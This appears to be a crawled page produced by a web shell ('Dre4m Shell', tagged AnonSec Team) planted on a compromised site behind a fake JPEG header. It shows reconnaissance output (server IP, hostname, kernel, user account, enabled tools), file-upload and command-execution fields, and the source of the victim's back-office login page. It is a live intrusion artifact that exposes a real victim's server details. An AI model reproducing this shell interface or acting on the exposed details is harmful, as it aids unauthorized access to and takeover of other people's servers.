ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/litsolide.com/ODLDDD_2/OLD/cp-admin/log/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/litsolide.com/ODLDDD_2/OLD/cp-admin/log/index.php
<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';

sec_session_start();

if (login_check($mysqli) == true) {
    $logged = 'in';
} else {
    $logged = 'out';
}

?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Back office v7.1</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

<!-- Gcms -->
  <link href="styles/bootstrap.css" rel="stylesheet" media="screen" />
  <link href="styles/font-awesome.min.css" type="text/css" rel="stylesheet" />
  <link type="text/css" href="styles/stylesheet.css" rel="stylesheet" media="screen" />
 
<!-- Original -->
  <link href="../assets/css/font-awesome.min.css" rel="stylesheet">
  <link href="styles/bootstrap-responsive.css" rel="stylesheet">
  <link href="styles/style.css?1407166711" rel="stylesheet">
 
	
<!-- Secure -->
        <script type="text/JavaScript" src="js/sha512.js"></script> 
        <script type="text/JavaScript" src="js/forms.js"></script>
        <link rel="stylesheet" href="styles/main.css" />
 
</head>
<body onload="document.forms['login_form'].elements['input-username'].focus()">
<div id="container">


<div id="content">
  <div class="container-fluid"><br />
    <br />
    <div class="row">
      <div class="col-sm-offset-4 col-sm-4">
        <div class="panel panel-login">
          <div class="panel-heading">
            <h1 class="panel-title"><i class="fa fa-lock"></i> Back-office v7.1</h1>
          </div>
          <div class="panel-body">
            <?php if ($success) { ?>
            <div class="alert alert-success"><i class="fa fa-check-circle"></i> <?php echo $success; ?>
              <button type="button" class="close" data-dismiss="alert">×</button>
            </div>
            <?php } ?>
            <?php if ($error_warning) { ?>
            <div class="alert alert-danger"><i class="fa fa-exclamation-circle"></i> <?php echo $error_warning; ?>
              <button type="button" class="close" data-dismiss="alert">×</button>
            </div>
            <?php } ?>
            
            
         <form action="includes/process_login.php" method="post" name="login_form"> 			
              <div class="form-group">
                <label for="input-username">E-mail</label>
                <div class="input-group"><span class="input-group-addon"><i class="fa fa-user"></i></span>
                 <input type="text" name="email"  placeholder="Votre adresse E-mail" id="input-username" class="form-control" />
                </div>
              </div>
              
              
              
              <div class="form-group">
                <label for="input-password">Mot de passe</label>
                <div class="input-group"><span class="input-group-addon"><i class="fa fa-lock"></i></span>
                


                  <input type="password" name="password" id="password" placeholder="Votre Mot de passe"  class="form-control" />
                </div>
                 
            

               <span class="help-block"><a href="https://seomedias.com/nous-contacter">Mot 
				de passe oublié</a></span>
               
              </div>
              <div class="text-right">
              
              
                <button type="submit"  value="Login"   onclick="formhash(this.form, this.form.password);"     class="btn btn-primary"><i class="fa fa-key"></i> 
				Connexion</button>
              </div>



            </form>

          </div>
        </div>
      </div>
    </div>
  </div>
</div>

<?php
 
?>







 
    </body>
</html>

Anon7 - 2022
AnonSec Team